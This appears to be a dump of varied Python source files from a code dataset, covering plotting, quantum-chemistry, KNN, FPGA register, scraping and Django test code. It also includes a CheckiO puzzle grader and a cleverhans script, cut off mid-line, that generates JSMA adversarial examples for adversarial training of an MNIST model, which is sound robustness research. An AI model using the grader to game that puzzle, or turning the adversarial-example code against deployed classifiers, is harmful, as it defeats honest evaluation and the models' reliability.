+{"seq_id":"1671687","text":"from params_proto import Proto, cli_parse\nfrom termcolor import cprint\n\n\n@cli_parse\nclass Args:\n data_path = Proto(\"~/fair/streetlearn/processed-data/manhattan-small\",\n help=\"path to the processed streetlearn dataset\")\n street_view_size = Proto((64, 64), help=\"image size for the dataset\", dtype=tuple)\n street_view_mode = Proto(\"omni-gray\", help=\"OneOf[`omni-gray`, `ombi-rgb`]\")\n\n lng_lat_correction = Proto(0.75, help=\"length correction factor for lattitude.\")\n\n latent_dim = Proto(2, help=\"latent space for the global embedding\")\n\n load_global_metric = \"episodeyang/plan2vec/2019/05-23/streetlearn/manhattan-small/gt-neighbor-success/show-goal\"\n\n\ndef visualize_global_metric(all_images, lng_lat, global_metric):\n \"\"\"assume that embedding function is 2D\"\"\"\n import torch\n\n with torch.no_grad():\n xs = torch.tensor(all_images, dtype=torch.float32)\n cs = global_metric(xs)\n\n print(cs.cpu().numpy())\n\n import matplotlib.pyplot as plt\n\n fig = plt.figure(figsize=(3, 3), dpi=140)\n plt.scatter(*cs.cpu().numpy().T, color=\"#23aaff\", alpha=0.5)\n # plt.xlim(-0.001, 0.001)\n # plt.ylim(-0.001, 0.001)\n plt.show()\n print('done')\n\n\ndef main():\n from termcolor import cprint\n import torch\n import numpy as np\n from ml_logger import logger\n from plan2vec.models.convnets import GlobalMetricConvDeepL2\n\n Args.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n if True: # load local metric\n cprint('loading global metric', \"yellow\", end=\"... \")\n\n global_metric = GlobalMetricConvDeepL2(1, Args.latent_dim).to(Args.device)\n\n # hard code args for experiment\n Args.model = type(global_metric).__name__\n logger.log_params(Args=vars(Args))\n\n logger.load_module(global_metric, Args.load_global_metric)\n # global_metric.eval()\n logger.log_text(str(global_metric), filename=\"models/global_metric.txt\")\n\n cprint('✔done', 'green')\n\n if True: # get rope dataset\n cprint('loading environment dataset', \"yellow\", end=\"... \")\n\n # collect sample here\n from streetlearn import StreetLearnDataset\n from os.path import expanduser\n\n streetlearn = StreetLearnDataset(expanduser(Args.data_path), Args.street_view_size, Args.street_view_mode)\n streetlearn.select_all()\n Args.streetlearn_bbox = streetlearn.bbox\n\n cprint('✔done', 'green')\n\n all_images = streetlearn.images[:, None, ...].astype(np.float32) / 255\n all_states = streetlearn.lng_lat\n\n visualize_global_metric(all_images, all_states, global_metric.encode)\n\n\nif __name__ == \"__main__\":\n from plan2vec_experiments import RUN, instr\n from ml_logger import logger\n\n if not logger.prefix:\n logger.configure(RUN.server, register_experiment=False)\n\n exp_prefix = \"episodeyang/plan2vec/2019/05-23/streetlearn/manhattan-tiny/gt-neighbor-success/2-agents\"\n with logger.PrefixContext(exp_prefix):\n weight_paths = sorted(logger.glob(\"**/global_metric*.pkl\"), reverse=True)\n\n cprint(f\"There are {len(weight_paths)} checkpoints.\", \"green\")\n for path in weight_paths:\n Args.load_global_metric = f\"/{exp_prefix}/{path}\"\n main()\n","sub_path":"plan2vec_experiments/goal-mass-image/analysis/visualize_global_embedding.py","file_name":"visualize_global_embedding.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403829975","text":"import plotly.graph_objs as go\nfrom plotly import tools\n\nfrom src.components.dataPokemon import dfPokemon\nfrom src.components.support import legendDict\n\n\nrowcolhist = {\n 'Generation' : {'row' : 3, 'col' : 2},\n 'Legendary' : {'row' : 1, 'col' : 2}\n}\n\ndef callbackupdatehistogram(x, hue, std):\n std = int(std)\n if(hue == 'All') :\n return dict(\n data=[\n go.Histogram(\n x=dfPokemon[\n (dfPokemon[x] >= (dfPokemon[x].mean() - (std * dfPokemon[x].std())))\n & (dfPokemon[x] <= (dfPokemon[x].mean() + (std * dfPokemon[x].std())))\n ][x],\n name='Normal',\n marker=dict(\n color='green'\n )\n ),\n go.Histogram(\n x=dfPokemon[\n (dfPokemon[x] < (dfPokemon[x].mean() - (std * dfPokemon[x].std())))\n | (dfPokemon[x] > (dfPokemon[x].mean() + (std * dfPokemon[x].std())))\n ][x],\n name='Not Normal',\n marker=dict(\n color='red'\n )\n )\n ],\n layout=go.Layout(\n title='Histogram {} Stats Pokemon'.format(x),\n xaxis=dict(title=x),\n yaxis=dict(title='Count'),\n height=450, width=1000\n )\n )\n subtitles = []\n for val in dfPokemon[hue].unique() :\n dfSub = dfPokemon[dfPokemon[hue] == val]\n outlierCount = len(dfSub[\n (dfSub[x] < (dfSub[x].mean() - (std * dfSub[x].std())))\n | (dfSub[x] > (dfSub[x].mean() + (std * dfSub[x].std())))\n ])\n subtitles.append(legendDict[hue][val] + \" ({}% outlier)\".format(round(outlierCount/len(dfSub) * 100, 2)))\n\n fig = tools.make_subplots(\n rows=rowcolhist[hue]['row'], cols=rowcolhist[hue]['col'],\n subplot_titles=subtitles\n )\n uniqueData = dfPokemon[hue].unique().reshape(rowcolhist[hue]['row'],rowcolhist[hue]['col'])\n index=1\n for r in range(1, rowcolhist[hue]['row']+1) :\n for c in range(1, rowcolhist[hue]['col']+1) :\n dfSub = dfPokemon[dfPokemon[hue] == uniqueData[r-1,c-1]]\n fig.append_trace(\n go.Histogram(\n x=dfSub[\n (dfSub[x] >= (dfSub[x].mean() - (std * dfSub[x].std())))\n & (dfSub[x] <= (dfSub[x].mean() + (std * dfSub[x].std())))\n ][x],\n name='Normal {} {}'.format(hue,uniqueData[r-1,c-1]),\n marker=dict(\n color='green'\n )\n ),r,c\n )\n fig.append_trace(\n go.Histogram(\n x=dfSub[\n (dfSub[x] < (dfSub[x].mean() - (std * dfSub[x].std())))\n | (dfSub[x] > (dfSub[x].mean() + (std * dfSub[x].std())))\n ][x],\n name='Not Normal {} {}'.format(hue, uniqueData[r-1,c-1]),\n marker=dict(\n color='red'\n )\n ),r,c\n )\n fig['layout']['xaxis'+str(index)].update(title=x.capitalize())\n fig['layout']['yaxis'+str(index)].update(title='Count')\n index += 1\n\n if(hue == 'Generation') :\n fig['layout'].update(height=700, width=1000,\n title='Histogram {} Stats Pokemon'.format(x))\n else :\n fig['layout'].update(height=450, width=1000,\n title='Histogram {} Stats Pokemon'.format(x))\n\n return fig","sub_path":"src/components/tab5/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"376160265","text":"def checker(data, user_result):\n try:\n solver = user_result\n stripe = eval(solver)\n if any((type(stripe) != str,\n len(stripe) != sum(len(ribbon) for ribbon in data),\n any(a not in '01' for a in stripe),\n any(a == b for a, b in zip(stripe, stripe[1:])))):\n return False\n cuts = sum(a == b for ribbon in data for a, b in zip(ribbon, ribbon[1:]))\n commutator = [[False] * len(ribbon) for ribbon in data]\n data = ['0' * len(ribbon) for ribbon in data]\n res = eval(solver)\n if '1' in res:\n return False\n targets = []\n for i, ribbon in enumerate(data):\n ribbon = list(ribbon)\n for j in range(len(ribbon)):\n ribbon[j] = '1'\n data[i] = ''.join(ribbon)\n res = eval(solver)\n if res.count('1') != 1:\n return False\n k = res.index('1')\n targets.append(k)\n commutator[i][j], ribbon[j] = k, '0'\n data[i] = ''.join(ribbon)\n targets.sort()\n if targets != list(range(len(stripe))):\n return False\n for i, switches in enumerate(commutator):\n for a, b in zip(switches, switches[1:]):\n cuts -= abs(a - b) != 1\n return not cuts\n except Exception:\n return False\n\nfrom checkio.signals import ON_CONNECT\nfrom checkio import api\nfrom checkio.referees.io import CheckiOReferee\nfrom checkio.referees.cover_codes import unwrap_args\n\nfrom tests import TESTS\n\n\napi.add_listener(\n ON_CONNECT,\n CheckiOReferee(\n tests=TESTS,\n checker=checker,\n function_name='checkio'\n ).on_ready)\n","sub_path":"verification/referee.py","file_name":"referee.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"248543037","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom .utils import versioned_reverse as reverse\n\n\n@pytest.mark.django_db\ndef test_list_endpoint_delete(api_client, user, event):\n api_client.force_authenticate(user)\n\n response = api_client.delete(reverse('event-list'), format='json')\n assert response.status_code == 405\n\n\n@pytest.mark.django_db\ndef test_event_delete(api_client, user, event):\n api_client.force_authenticate(user)\n\n response = api_client.delete(reverse('event-detail', kwargs={'pk': event.id}))\n assert response.status_code == 204\n\n response = api_client.get(reverse('event-detail', kwargs={'pk': event.id}))\n assert response.status_code == 410\n","sub_path":"events/tests/test_event_delete.py","file_name":"test_event_delete.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"451688922","text":"import tkinter as tk\r\ntop=tk.Tk()\r\nhello=tk.Label(top,text='hello,world')\r\nhello.pack()\r\nquit=tk.Button(top,text='QUIT',command=top.quit,bg='red',fg='white')\r\nquit.pack(fill=tk.X,expand=1) #pack的参数都是些什么意思\r\ntk.mainloop()\r\n\r\n'''\r\npack 参数说明\r\nafter -- 将组件放置在其他组件之后\r\nbefore -- 之前\r\nfill -- X横向填充(默认,各组件自上而下), Y竖向填充(各组件自左往右)\r\nexpand -- 1父外框大小改变时,自动扩充大小,0为false\r\nside -- 组件在父组件的哪一边上 left right top bottom (使用时使用tkinter.TOP或者tkinter.E等等)\r\nanchor -- 对齐方式 顶对齐n,底对齐s,左w,右e\r\n'''","sub_path":"tkhello3.py","file_name":"tkhello3.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106628963","text":"__author__ = 'jameskrach'\n__email__ = 'jck2156@columbia.edu'\n\nimport csv\nfrom random import shuffle\nfrom operator import itemgetter\nfrom collections import Counter\n\nimport numpy as np\n\n\ndef read_trainer(file):\n \"\"\"Opens file and returns each observation as an element of data.\n data[i][0] is the class and data[i][1:] is the observation.\"\"\"\n with open(file, 'rU') as f:\n temp = list(list(item) for item in csv.reader(f, delimiter=','))\n data = [[temp[i][1], np.array(list(map(float, temp[i][2:])))] for i in range(len(temp))]\n return data\n\n\ndef strip_observations(known_set):\n \"\"\"Creates an array of just the observations (in the same order as known_set).\"\"\"\n obs = known_set[0][1]\n for i in range(1, len(known_set)):\n obs = np.vstack((obs, known_set[i][1]))\n return obs\n\n\ndef strip_classes(known_set):\n \"\"\"Returns a list of just the classes of known points.\"\"\"\n cls = []\n for i in range(len(known_set)):\n cls.append(known_set[i][0])\n return cls\n\n\ndef make_synth():\n \"\"\"Makes synthetic data, takes no arguments for simplicity. Change parameters in function\n to change the data set.\"\"\"\n mean1 = [2, 5.5]\n cov1 = [[1, 1], [1, 2.5]]\n n1 = 250\n c1 = []\n rand = np.random.multivariate_normal(mean1, cov1, n1)\n for i in range(n1):\n c1.append(['1', rand[i]])\n\n mean2 = [.5, 1]\n cov2 = [[1, 0], [0, 1]]\n n2 = 250\n c2 = []\n rand = np.random.multivariate_normal(mean2, cov2, n2)\n for i in range(n2):\n c2.append(['2', rand[i]])\n\n return c1 + c2\n\n\ndef even_split(lst, p):\n \"\"\"Splits a list as evenly as possible into p elements. Shortest lists at the end.\"\"\"\n num_long = len(lst) % p # Number of longer-by-1 lists\n num_short = p - num_long\n if num_long:\n long_case = (len(lst)//p) + 1 # Length of a long list\n short_case = (len(lst)//p) # Length of a short list\n else:\n long_case = 0\n short_case = int(len(lst)/p)\n p_lists = []\n inx = 0\n for i in range(num_long):\n p_lists.append(lst[inx:inx+long_case])\n inx += long_case\n for i in range(num_short):\n p_lists.append(lst[inx:inx+short_case])\n inx += short_case\n return p_lists\n\n\ndef KNNclassifier(training, test, k, type_norm):\n \"\"\"Classifies test data by taking the l2-norm from a training set. All operations are\n vectorized so it should be fast.\"\"\"\n classified = []\n mat = strip_observations(training)\n for i in test:\n temp = np.copy(mat)\n for j in range(len(temp)):\n temp[j] -= i # Subtract test observation i from each row of a temporary array\n dist = []\n for l in range(len(temp)):\n dist.append((np.linalg.norm(temp[l], ord=type_norm), training[l][0])) # Calculate norm and append\n dist = sorted(dist, key=itemgetter(0)) # Sorts by first element of tuple\n knn = [dist[i][1] for i in range(k)] # classes of k nearest points\n i_class = Counter(knn).most_common(1) # mode of knn\n classified.append(i_class[0][0]) # Append class of i_class to output\n return classified\n\n\ndef NNclassifier(training, test):\n \"\"\"Uses KNNClassifier with k=1.\"\"\"\n return KNNclassifier(training, test, 1)\n\n\ndef n_validator(data, p, classifier, *args):\n \"\"\"Works for p >= 2.\"\"\"\n shuffle(data)\n chunks = even_split(data, p)\n correct = 0\n for i in range(len(chunks)):\n temp_trainer = []\n for j in chunks[0:i]:\n temp_trainer += j\n for j in chunks[i+1:]:\n temp_trainer += j\n temp_test = strip_observations(chunks[i])\n actual_class = strip_classes(chunks[i])\n model = classifier(temp_trainer, temp_test, *args)\n for j in range(len(actual_class)):\n if actual_class[j] == model[j]:\n correct += 1\n return correct / len(data)","sub_path":"hw6/neighbor.py","file_name":"neighbor.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266351181","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport time\nimport copy\nimport tempfile\nimport numpy\nimport scipy.linalg\nimport pyscf.lib.logger as logger\nimport pyscf.scf\nfrom pyscf.mcscf import casci\nfrom pyscf.mcscf import aug_hessian\nfrom pyscf.mcscf import mc1step\nfrom pyscf.mcscf import mc2step\n\n\nclass CASSCF(mc1step.CASSCF):\n def __init__(self, mf, ncas, nelecas, ncore=None):\n assert(mf.mol.symmetry)\n# Ag, A1 or A\n#TODO: self.wfnsym = pyscf.symm.param.CHARACTER_TABLE[mol.groupname][0][0]\n self.orbsym = []\n mc1step.CASSCF.__init__(self, mf, ncas, nelecas, ncore)\n\n def mc1step(self, mo_coeff=None, ci0=None, macro=None, micro=None, **cikwargs):\n if mo_coeff is None:\n mo_coeff = self.mo_coeff\n else:\n self.mo_coeff = mo_coeff\n if macro is None:\n macro = self.max_cycle_macro\n if micro is None:\n micro = self.max_cycle_micro\n\n self.mol.check_sanity(self)\n\n self.dump_flags()\n\n #irrep_name = self.mol.irrep_name\n irrep_name = self.mol.irrep_id\n self.orbsym = pyscf.symm.label_orb_symm(self.mol, irrep_name,\n self.mol.symm_orb,\n self.mo_coeff)\n\n if not hasattr(self.fcisolver, 'orbsym') or \\\n not self.fcisolver.orbsym:\n ncore = self.ncore\n nocc = self.ncore + self.ncas\n self.fcisolver.orbsym = self.orbsym[ncore:nocc]\n\n self.converged, self.e_tot, e_cas, self.ci, self.mo_coeff = \\\n mc1step.kernel(self, mo_coeff, \\\n tol=self.conv_tol, macro=macro, micro=micro, \\\n ci0=ci0, verbose=self.verbose, **cikwargs)\n #if self.verbose >= logger.INFO:\n # self.analyze(mo_coeff, self.ci, verbose=self.verbose)\n return self.e_tot, e_cas, self.ci, self.mo_coeff\n\n def mc2step(self, mo_coeff=None, ci0=None, macro=None, micro=None, **cikwargs):\n if mo_coeff is None:\n mo_coeff = self.mo_coeff\n else:\n self.mo_coeff = mo_coeff\n if macro is None:\n macro = self.max_cycle_macro\n if micro is None:\n micro = self.max_cycle_micro\n\n self.mol.check_sanity(self)\n\n self.dump_flags()\n\n #irrep_name = self.mol.irrep_name\n irrep_name = self.mol.irrep_id\n self.orbsym = pyscf.symm.label_orb_symm(self.mol, irrep_name,\n self.mol.symm_orb,\n self.mo_coeff)\n if not hasattr(self.fcisolver, 'orbsym') or \\\n not self.fcisolver.orbsym:\n ncore = self.ncore\n nocc = self.ncore + self.ncas\n self.fcisolver.orbsym = self.orbsym[ncore:nocc]\n\n self.converged, self.e_tot, e_cas, self.ci, self.mo_coeff = \\\n mc2step.kernel(self, mo_coeff, \\\n tol=self.conv_tol, macro=macro, micro=micro, \\\n ci0=ci0, verbose=self.verbose, **cikwargs)\n #if self.verbose >= logger.INFO:\n # self.analyze(mo_coeff, self.ci, verbose=self.verbose)\n return self.e_tot, e_cas, self.ci, self.mo_coeff\n\n def gen_g_hop(self, mo, casdm1, casdm2, eris):\n g_orb, h_op, h_diag = mc1step.gen_g_hop(self, mo, casdm1, casdm2, eris)\n g_orb = _symmetrize(self.unpack_uniq_var(g_orb), self.orbsym,\n self.mol.groupname)\n h_diag = _symmetrize(self.unpack_uniq_var(h_diag), self.orbsym,\n self.mol.groupname)\n def sym_h_op(x):\n hx = h_op(x)\n hx = _symmetrize(self.unpack_uniq_var(hx), self.orbsym,\n self.mol.groupname)\n return self.pack_uniq_var(hx)\n return self.pack_uniq_var(g_orb), sym_h_op, \\\n self.pack_uniq_var(h_diag)\n\n def rotate_orb(self, mo, casdm1, casdm2, eris, dx=0):\n u, dx, g_orb, jkcnt = \\\n mc1step.rotate_orb_ah(self, mo, casdm1, casdm2, eris, dx,\n self.verbose)\n u = _symmetrize(u, self.orbsym, self.mol.groupname)\n dx = _symmetrize(self.unpack_uniq_var(dx), self.orbsym,\n self.mol.groupname)\n return u, self.pack_uniq_var(dx), g_orb, jkcnt\n\ndef _symmetrize(mat, orbsym, groupname, wfnsym=0):\n irreptab = pyscf.symm.param.IRREP_ID_TABLE[groupname]\n if isinstance(wfnsym, str):\n wfnsym = irreptab[wfnsym]\n\n mat1 = numpy.zeros_like(mat)\n for i0 in set(orbsym):\n irallow = wfnsym ^ i0\n lst = [j for j,i in enumerate(orbsym) if i == irallow]\n for j in lst:\n mat1[j,lst] = mat[j,lst]\n return mat1\n\n\nif __name__ == '__main__':\n from pyscf import gto\n from pyscf import scf\n import pyscf.fci\n from pyscf.mcscf import addons\n\n mol = gto.Mole()\n mol.verbose = 0\n mol.output = None\n\n mol.atom = [\n ['O', ( 0., 0. , 0. )],\n ['H', ( 0., -0.757, 0.587)],\n ['H', ( 0., 0.757 , 0.587)],]\n mol.basis = {'H': 'cc-pvdz',\n 'O': 'cc-pvdz',}\n mol.symmetry = 1\n mol.build()\n\n m = scf.RHF(mol)\n ehf = m.scf()\n mc = CASSCF(m, 6, 4)\n mc.fcisolver = pyscf.fci.solver(mol)\n mc.verbose = 4\n mo = addons.sort_mo(mc, m.mo_coeff, (3,4,6,7,8,9), 1)\n emc = mc.mc1step(mo)[0]\n print(ehf, emc, emc-ehf)\n #-76.0267656731 -76.0873922924 -0.0606266193028\n print(emc - -76.0873923174, emc - -76.0926176464)\n\n mc = CASSCF(m, 6, (3,1))\n #mc.fcisolver = pyscf.fci.direct_spin1\n mc.fcisolver = pyscf.fci.solver(mol, False)\n mc.verbose = 4\n emc = mc.mc1step(mo)[0]\n print(emc - -75.7155632535814)\n","sub_path":"mcscf/mc1step_symm.py","file_name":"mc1step_symm.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"56669894","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 18 15:11:14 2015\r\n\r\n@author: wsong\r\n\"\"\"\r\n\r\nfrom lxml.html import parse\r\nfrom urllib2 import urlopen\r\nfrom pandas import Series,DataFrame\r\n\r\nparsed=parse(urlopen('http://finance.yahoo.com/q/op?s=AAPL+Options'))\r\ndoc=parsed.getroot()\r\n\r\nlinks=doc.findall('.//a')\r\n\r\nlnk1=links[28]\r\nhref1=lnk1.get('href')\r\ntxt=lnk1.text_content()\r\n\r\nurls=[lnk.get('href') for lnk in doc.findall('.//a')]\r\nurls[-10:]\r\n\r\ntables=doc.findall('.//table')\r\n#calls=tables[1]\r\n#puts=tables[2]\r\n#\r\n#rows=calls.findall('.//tr')\r\n#\r\n#def _unpack(row,kind='td'):\r\n# elts=row.findall('.//%s' % kind)\r\n# return [val.text_content() for val in elts]\r\n#\r\n#up1=_unpack(rows[0],kind='th')\r\n#up2=_unpack(rows[1],kind='td')\r\n#\r\n#\r\n#from pandas.io.parsers import TextParser\r\n#\r\n#def parse_options_data(table):\r\n# rows=table.findall('.//tr')\r\n# header=_unpack(rows[0],kind='th')\r\n# data=[_unpack(r) for r in rows[1:]]\r\n# return TextParser(data,names=header).get_chunk(0)\r\n#\r\n#call_data=parse_options_data(calls)\r\n#put_data=parse_options_data(puts)\r\n\r\n\r\n\r\nfrom lxml import objectify\r\n\r\npath='ex7.txt'\r\nparsed=objectify.parse(open(path))\r\nroot=parsed.getroot()\r\n\r\ndata=[]\r\nskip_fields=['genre']\r\n\r\nfor elt in root.book:\r\n el_data={}\r\n for child in elt.getchildren():\r\n if child.tag in skip_fields:\r\n continue\r\n el_data[child.tag]=child.pyval\r\n data.append(el_data)\r\n\r\ndf1=DataFrame(data)\r\n\r\nfrom StringIO import StringIO\r\ntag='Google'\r\nroot=objectify.parse(StringIO(tag)).getroot()\r\n\r\nroot.tag\r\nroot.get('href')\r\nroot.text\r\n\r\n\r\nframe=pd.read_csv('ex4.txt')\r\nframe.to_pickle('frame_pickle')\r\n\r\nframe2=pd.read_pickle('frame_pickle')\r\n\r\n\r\nxls_file1=pd.ExcelFile('ExcelTest.xlsx')\r\nxls_file2=pd.ExcelFile('ExcelTest.xls')\r\n\r\ntable1=xls_file1.parse('Sheet1')\r\ntable2=xls_file1.parse('Sheet1')\r\n\r\n\r\n","sub_path":"dataXML.py","file_name":"dataXML.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"85216023","text":"class Solution:\r\n # @param n, an integer\r\n # @return an integer\r\n def reverseBits(self, n):\r\n\r\n m, k = 0, 2 ** 31\r\n\r\n for i in xrange(32):\r\n\r\n n, m, k = n / 2, m + (n % 2) * k, k / 2\r\n\r\n return m\r\n","sub_path":"190-reverseBit.py","file_name":"190-reverseBit.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246108040","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 13 09:57:04 2017\n\n@author: Administrator\n\"\"\"\n\nfrom EV_FPGA import XilinxFPGA\nfrom EV_REG_CTRL import REG_CTRL\nimport time\nGREG_DAC_34H84_CTRL = 20\nclass DAC_34H84_test_data_CTRL(REG_CTRL):\n addrType = \"FpgaPcieAddr\"\n baseAddr = GREG_DAC_34H84_CTRL\n ch_select= 0\n status = {\n \"sync_freq_word\":0,\n \"phy_rst\" :0,\n \"test_mode\" :1,\n \"test_data\" :0,\n \"parttern_10\" :0,\n \"parttern_32\" :0,\n \"parttern_54\" :0,\n \"parttern_76\" :0,\n \"seq_maxlimit\" :0,\n \"squ_step\" :0\n }\n ctrl_dict = {\n # signal_name: [start_bit,end_bit,reg_offset,rw]\n \"sync_freq_word\": [31,16,0,'rw'],\n \"phy_rst\" : [4,4, 0,'rw'], \n \"test_mode\" : [2, 0, 0,'rw'],\n \"test_data\" : [15,0, 1,'rw'],\n \"parttern_10\" : [31,0, 2,'rw'],\n \"parttern_32\" : [31,0, 3,'rw'],\n \"parttern_54\" : [31,0, 4,'rw'],\n \"parttern_76\" : [31,0, 5,'rw'],\n \"seq_maxlimit\" : [15,0, 6,'rw'],\n \"squ_step\" : [31,16,6,'rw'], \n } \n \n def __init__(self, fpga, baseAddr=-1):\n REG_CTRL.__init__(self,fpga, baseAddr) \n\n def set_test_mode(self,mode,wdata):\n self.ctrl(\"test_mode\",mode) \n self.ctrl(\"test_data\",wdata)\n def set_io_test_pattern_0(self):\n \"\"\"default pattern\"\"\"\n self.ctrl(\"parttern_10\",0xb6b67a7a) \n self.ctrl(\"parttern_32\",0x4545eaea) \n self.ctrl(\"parttern_54\",0x16161a1a) \n self.ctrl(\"parttern_76\",0xc6c6aaaa)\n# self.ctrl(\"parttern_10\",0x0000ffff) \n# self.ctrl(\"parttern_32\",0x0000ffff) \n# self.ctrl(\"parttern_54\",0x0000ffff) \n# self.ctrl(\"parttern_76\",0x0000ffff)\n def set_io_test_pattern_1(self):\n \"\"\"default pattern\"\"\"\n self.ctrl(\"parttern_10\",0x0000ffff) \n self.ctrl(\"parttern_32\",0x0000ffff) \n self.ctrl(\"parttern_54\",0x0000ffff) \n self.ctrl(\"parttern_76\",0x0000ffff)\n \n def phy_rst(self):\n self.ctrl(\"phy_rst\",1)\n self.ctrl(\"phy_rst\",0) \n def set_squ_step_limt(self,step,limit):\n self.ctrl(\"squ_step\",step)\n self.ctrl(\"seq_maxlimit\",limit)\n \n#class DAC_34H84_test1_data_CTRL(REG_CTRL):\n# addrType = \"FpgaPcieAddr\"\n# baseAddr = GREG_DAC_34H84_CTRL\n# ch_select= 0\n# status = {\n# \"test_data\" :0\n# }\n# ctrl_dict = {\n# # signal_name: [start_bit,end_bit,reg_offset,rw]\n# \n# \"test_data\" : [31,16, 0,'rw'],\n# \n# } \n# \n# def __init__(self, fpga, baseAddr=-1):\n# REG_CTRL.__init__(self,fpga, baseAddr) \n#\n# def test(self,wdata):\n# self.ctrl(\"test_data\",wdata) \n# \n# def test_wave(self):\n# i=0;\n# while 1 :\n# i=0\n# while i <0xffff :\n# self.test(i)\n# i=i+1;\n","sub_path":"PyFPGA_mini/EV_AD34H84_phy_data_test.py","file_name":"EV_AD34H84_phy_data_test.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275082662","text":"import tensorflow as tf\nimport keras\nimport numpy as np\nfrom cleverhans.utils_keras import KerasModelWrapper\nfrom cleverhans.attacks import SaliencyMapMethod\nfrom cleverhans.dataset import MNIST\nfrom cleverhans.train import train\nfrom cleverhans.utils import AccuracyReport\nfrom cleverhans.loss import CrossEntropy\nfrom cleverhans.utils_tf import model_eval\nfrom models import cnn_model, mlp_model\n\nNB_EPOCHS_LEGITIMATE = 100\nNB_EPOCHS_ADV = 50\nBATCH_SIZE = 128\nLEARNING_RATE = .001\nTRAIN_DIR = 'train_dir'\nFILENAME = 'mnist.ckpt'\nLABEL_SMOOTHING = 0\n\nkeras.layers.core.K.set_learning_phase(0)\n\n# Object used to keep track of (and return) key accuracies\nreport = AccuracyReport()\n\n# Set TF random seed to improve reproducibility\ntf.set_random_seed(1234)\n\n# Create TF session and set as Keras backend session\n#sess = tf.Session()\n#sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True))\nsess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))\nkeras.backend.set_session(sess)\n\n# Get MNIST test data\nmnist = MNIST(train_start=0, train_end=2500,\n test_start=0, test_end=10000)\nx_train, y_train = mnist.get_set('train')\nx_test, y_test = mnist.get_set('test')\n\n# Obtain Image Parameters\nimg_rows, img_cols, nchannels = x_train.shape[1:4]\nnb_classes = y_train.shape[1]\n\n# Define input TF placeholder\nx = tf.placeholder(tf.float32, shape=(None, img_rows, img_cols, nchannels))\ny = tf.placeholder(tf.float32, shape=(None, nb_classes))\n\n# Define TF model graph\n\nmodel = cnn_model(img_rows=img_rows, img_cols=img_cols, channels=nchannels, nb_filters=128, nb_classes=nb_classes)\n\n#model = mlp_model(img_rows=img_rows, img_cols=img_cols,nb_classes=nb_classes)\npreds = model(x)\nprint(\"Defined TensorFlow model graph.\")\n\n# Train an MNIST model\ntrain_params_leg = {\n 'nb_epochs': NB_EPOCHS_LEGITIMATE,\n 'batch_size': BATCH_SIZE,\n 'learning_rate': LEARNING_RATE,\n 'train_dir': TRAIN_DIR,\n 'filename': FILENAME\n}\n\nrng = np.random.RandomState([2018, 11, 26])\nwrap = KerasModelWrapper(model)\n\n# function that is run after each training iteration\ndef evaluate():\n # Evaluate the accuracy of the MNIST model on legitimate test examples\n eval_params = {'batch_size': BATCH_SIZE}\n acc_test = model_eval(sess, x, y, preds, x_test, y_test, args=eval_params)\n acc_train = model_eval(sess, x, y, preds, x_train, y_train, args=eval_params)\n report.clean_train_clean_eval = acc_test\n print('Test set accuracy on legitimate examples: %0.4f' % acc_test)\n print('Training set accuracy on legitimate examples: %0.4f' % acc_train)\n\n# training on legitimate data\nloss = CrossEntropy(wrap, smoothing=LABEL_SMOOTHING)\ntrain(sess, loss, x_train, y_train, evaluate=evaluate, args=train_params_leg, rng=rng)\n\n# Initialize the Fast Gradient Sign Method (FGSM) attack object and graph\njsma = SaliencyMapMethod(wrap, sess=sess)\njsma_params = {'theta': 1., 'gamma': 0.1,\n 'clip_min': 0., 'clip_max': 1.,\n 'y_target': None}\ndef attack(x):\n return jsma.generate(x, **jsma_params)\n\nadv_x = attack(x)\n\npreds_adv = model(adv_x)\n\nprint(\"Repeating the process, using adversarial training\")\n\nloss_2 = CrossEntropy(wrap, smoothing=LABEL_SMOOTHING, attack=attack)\n\ndef evaluate_2():\n # Accuracy of adversarially trained model on legitimate test inputs\n eval_params = {'batch_size': BATCH_SIZE}\n accuracy = model_eval(sess, x, y, preds, x_test, y_test,\n args=eval_params)\n print('Test accuracy on legitimate examples: %0.4f' % accuracy)\n report.adv_train_clean_eval = accuracy\n\n # Accuracy of the adversarially trained model on adversarial examples\n #accuracy = model_eval(sess, x, y, preds_adv, x_test,\n # y_test, args=eval_params)\n #print('Test accuracy on adversarial examples: %0.4f' % accuracy)\n #report.adv_train_adv_eval = accuracy\n\ntrain_params_adv = {\n 'nb_epochs': NB_EPOCHS_ADV,\n 'batch_size': BATCH_SIZE,\n 'learning_rate': LEARNING_RATE,\n 'train_dir': TRAIN_DIR,\n 'filename': FILENAME\n}\n# Perform and evaluate adversarial training\ntrain(sess, loss_2, x_train, y_train, evaluate=evaluate_2, args=train_params_adv, 